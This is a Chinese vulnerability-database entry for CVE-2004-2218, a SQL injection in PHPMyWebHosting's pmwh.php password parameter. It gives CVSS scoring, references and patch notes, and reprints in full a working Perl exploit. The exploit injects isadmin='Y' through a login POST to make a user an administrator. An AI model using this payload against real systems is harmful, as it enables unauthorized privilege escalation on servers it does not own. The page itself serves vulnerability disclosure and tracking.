CVE-2004-2218
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:43:31
NMCOE    

[原文]SQL injection vulnerability in pmwh.php in PHPMyWebHosting 0.3.4 and earlier allows remote attackers to modify SQL statements via the password parameter.


[CNNVD]PHPMyWebHosting SQL注入漏洞(CNNVD-200412-797)

        PHPMyWebHosting 0.3.4及其更早版本中的pmwh.php存在SQL注入漏洞。远程攻击者可以借助password参数修改SQL语句。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2218
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2218
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-797
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/17005
(PATCH)  XF  phpmywebhosting-pmwh-sql-injection(17005)
http://www.securityfocus.com/bid/10942
(PATCH)  BID  10942
http://archives.neohapsis.com/archives/bugtraq/2004-09/0247.html
(PATCH)  BUGTRAQ  20040920 Re: Posible security bug in phpMyWebhosting
http://www.osvdb.org/8976
(UNKNOWN)  OSVDB  8976
http://archives.neohapsis.com/archives/bugtraq/2004-08/0207.html
(UNKNOWN)  BUGTRAQ  20040814 Posible security bug in phpMyWebhosting

- 漏洞信息

PHPMyWebHosting SQL注入漏洞
高危 SQL注入
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        PHPMyWebHosting 0.3.4及其更早版本中的pmwh.php存在SQL注入漏洞。远程攻击者可以借助password参数修改SQL语句。

- 公告与补丁

        The vendor has released a patch to address this issue:
        PHPMyWebHosting PHPMyWebHosting 0.3.4
        

- 漏洞信息 (406)

phpMyWebhosting SQL Injection Exploit (EDBID:406)
php webapps
2004-08-20 Verified
0 Noam Rathaus
N/A [点击下载]
#!/usr/bin/perl
# Exploit code by Noam Rathaus of Beyond Security Ltd.
# The following exploit code will use a valid username and password 
combination, to cause an SQL injection.
# Using the SQL injection, the Perl script elevates the privileges of the 
user provided to administrative.

use IO::Socket;
use strict;

my $Host = shift;
my $Path = shift;
my $Username = shift;
my $Password = shift;

if ($Host eq "" || $Path eq "" || $Username eq "" || $Password eq "")
{
print "You must run the script with the following syntax:\n";
print $0." hostname path username password\n";
exit(0);
}

my $remote = IO::Socket::INET->new (  Proto => "tcp", PeerAddr => $Host, 
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $Host" }

print "connected\n";

$remote->autoflush(1);

my $http = "POST /$Path/index.php HTTP/1.1
Host: $Host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040506 
Firefox/0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

my $content = 
"PHP_AUTH_USER=$Username&password=$Password&language=english',isadmin='Y&login=Login";

$http .= length($content)."

$content";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

while ()
{
print $_;
}
print "\n";

close $remote;


# milw0rm.com [2004-08-20]
		

- 漏洞信息

8976
phpMyWebhosting pmwh.php password Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

phpMyWebhosting contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the username variable in the pmwh.php module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

- 时间线

2004-08-14 Unknow
2004-08-14 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, phpMyWebhosting has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站